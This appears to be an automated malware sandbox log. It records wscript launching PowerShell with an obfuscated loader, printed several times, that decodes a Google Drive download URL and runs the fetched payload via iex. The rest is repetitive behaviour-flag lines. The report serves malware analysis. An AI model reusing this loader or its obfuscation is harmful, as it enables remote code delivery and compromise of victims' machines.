Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge erMUnciabDrvtylDon ee PutnmGlyc ePlat nskovttamalgsopvel.rabb.sAnac
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNatur
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4738Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5170Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000002.00000002.1394575729.000001D95CB67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$karyokinesis104 = 1;$unrefracting='substrin';$unrefracting+='g';function agonothet($haandgribelige){$judiciousness=$haandgribelige.length-$karyokinesis104;for($organoleptically=5; $organoleptically -lt $judiciousness; $organoleptically+=(6)){$bundlses+=$haandgribelige.$unrefracting.invoke($organoleptically, $karyokinesis104);}$bundlses;}function popess($rdstjerternes){& ($speecher) ($rdstjerternes);}$stentrykkerierne=agonothet 'suspimstaccounvigzoverli ,ntolquainl degeapaste/arabi5strat.in.er0v,cci petit(mo,igw und,id armn c brdradioostraawpharys.yldi tilstnafhjetcanad skov1s,edi0 min..h nds0 pant;svend ne.pawbivalipaveknposts6se,ip4poro.;plebi conatxhuele6 gras4servi;sonny ,ivvargeckovshipp: dans1 ulmu2runen1 pro .br.sn0 fina)se vt unde gforstedesinchansgkbelonoforh./epose2atmoc0nedve1float0missi0vigne1harce0 gang1pte o .egynfendl ikonverpanerekruspf x.loo distxabdu./klass1 fr.m2chink1auten.l.del0rulle ';$untestable27=agonothet ' polyutarogs,onheejobs r,okse-ted ia olymgunhanesagitnmattetdanse ';$mblements=agonothet 'befryhun ertgr.fit tagsppul,os.jtad:macro/t,edo/ na.udbascurshippichangvauxinebegrn. a isgprimeolovbeo t rng stralgoogoed fer.evighcsusp,ofr semdeg,a/agftaulea hctppeb?.asimeflavoxtautop tremo natur,irketagerk=piet.dvindiospisewdespinpaakllfishsoel,esamo.aidhiela&outgli .lgedrusti=seign1 udstp quen8 overcafblaaka hi5i.terishawiwskovrvafparrs.icigintragarrhigrtenjedemargleptobjo,glhbolst5 s.rjjtillgtgens.5 termsparosaovern7tingeb .kstzstilpddk,eniascesw fo.wacolu.7 lazadfemgrewaggo ';$gashes=agonothet 'vekse> tlle ';$speecher=agonothet 'gl.cyitr.nseekspoxs,ibs ';$hjemgivelsen='drfyldingen';popess (agonothet 'sam.usretateo,pebtducti-kangac li sogrundnensomtozon.estratnileitt dank p.ri-besaap kan.aprefat alfah tora kismtdrmm.:halm \ ullec ghosl whalu le.nsdomnetrewineaccesr,necdylands.fejlutnonauxcamayt.unkt ubud -binapvovermaakti.l billuunparepr.in rubri$jackahinaprjjer.beastr,mscenag rolliband.vrecule 